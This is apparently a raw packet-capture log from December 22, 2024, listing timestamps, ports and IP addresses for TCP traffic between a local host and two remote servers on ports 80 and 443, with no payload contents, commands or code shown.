Dec 22, 2024 02:16:31.342386961 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.343023062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.343127966 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.343211889 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.343907118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.344054937 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.344080925 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.344187975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.344710112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.344841003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.344924927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.345556974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.345669031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.345746994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.346421003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.346519947 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.346606016 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.347264051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.347398043 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.347476006 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.348107100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.348229885 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.348309994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.348973989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.349241018 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.349311113 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.349821091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.350321054 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.350399971 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.350667953 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.350763083 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.350820065 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.351558924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.351660967 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.351710081 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.352355003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.352473974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.352524996 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.353193045 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.353322029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.353369951 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.354078054 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.354126930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.354195118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.354897022 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.354943991 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.503248930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.503348112 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.503386021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.503423929 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.503509998 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.503509998 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.504029036 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.504147053 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.504201889 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.504216909 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.504260063 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.504949093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.505049944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.505121946 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.505785942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.505899906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.505902052 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.506619930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.506671906 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.506736040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.507467031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.507524967 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.507596016 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.507644892 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.508357048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.508467913 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.508519888 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.509191990 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.509314060 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.509361982 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.510025978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.510080099 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.510164976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.510885000 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.510921001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.510938883 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.510961056 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.511766911 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.511883974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.511929989 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.512579918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.512707949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.512763023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.513453007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.513505936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.513586044 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.514246941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.514296055 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.514358997 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.515084982 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.515127897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.515197992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.515247107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.515933990 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.516043901 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.516050100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.516088963 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.516815901 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.516859055 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.516904116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.516948938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.517647982 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.517692089 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.517736912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.517786026 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.518487930 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.518532038 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.518577099 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.518625975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.519357920 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.519404888 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.519480944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.519527912 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.520195007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.520301104 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.520347118 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.521070004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.521147013 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.521198988 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.521914005 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.521982908 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.522032976 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.522742987 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.522880077 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.522936106 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.523591042 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.523695946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.523746014 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.524457932 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.524558067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.524607897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.525273085 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.525382042 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.525434017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.526132107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.526233912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.526287079 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.526995897 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.527045965 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.527091026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.527831078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.527882099 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.527899027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.528218985 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.528661966 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.528774977 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.528826952 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.529525995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.529643059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.529695988 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.530375004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.530488968 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.530544043 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.531232119 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.531301975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.531328917 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.531383038 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.532089949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.532198906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.532279015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.532928944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.533093929 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.533166885 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.533765078 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.533874989 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.533950090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.534627914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.534733057 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.534806013 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.535485983 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.535612106 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.535685062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.536359072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.536475897 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.536551952 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.537158012 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.537270069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.537343025 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.538018942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.538129091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.538203001 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.538861036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.538973093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.539045095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.539726973 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.539838076 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.539911985 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.540566921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.540676117 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.540750980 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.541431904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.541553974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.541632891 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.542279959 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.542457104 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.542534113 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.543174028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.543271065 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.543346882 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.543987036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.544076920 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.544121027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.544202089 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.544841051 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.544936895 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.545017958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.545725107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.545778036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.545860052 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.546510935 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.546612024 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.546689034 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.547332048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.548142910 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.600864887 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:31.600922108 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:31.602849960 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:31.602859020 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:31.603080988 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:31.604484081 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:31.604501963 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:31.604545116 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:31.695076942 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.695209026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.695286036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.695498943 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.695552111 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.696103096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.696155071 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.696259975 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.696326017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.697007895 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.697149992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.697215080 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.697844982 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.697993040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.698049068 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.698693037 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.698869944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.698930025 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.699569941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.699665070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.699726105 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.700377941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.700521946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.700582981 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.701237917 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.701370955 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.701457977 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.702100039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.702229977 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.702310085 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.702944040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.703080893 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.703160048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.703794003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.703917027 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.704001904 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.704659939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.704771042 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.704849958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.705519915 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.705620050 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.705699921 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.706322908 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.706435919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.706512928 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.707160950 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.707285881 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.707362890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.708055973 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.708159924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.708240986 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.708889008 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.709083080 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.709161043 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.709752083 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.709882021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.709956884 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.710588932 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.710717916 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.710794926 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.711452961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.711505890 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.711581945 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.712296009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.712435961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.712516069 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.713131905 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.713249922 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.713326931 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.714004040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.714205980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.714284897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.714916945 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.714979887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.715053082 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.715886116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.715970039 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.716041088 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.716486931 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.716610909 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.716686010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.717335939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.717442036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.717514992 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.718197107 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.718301058 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.718372107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.719079971 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.719189882 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.719264030 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.719894886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.720042944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.720102072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.720737934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.720845938 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.720916033 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.721589088 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.721705914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.721776962 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.722438097 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.722593069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.722664118 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.723288059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.723401070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.723473072 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.724159002 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.724271059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.724343061 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.724981070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.725076914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:31.725147009 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:31.725824118 CET	80	49804	31.41.244.11	192.168.2.4
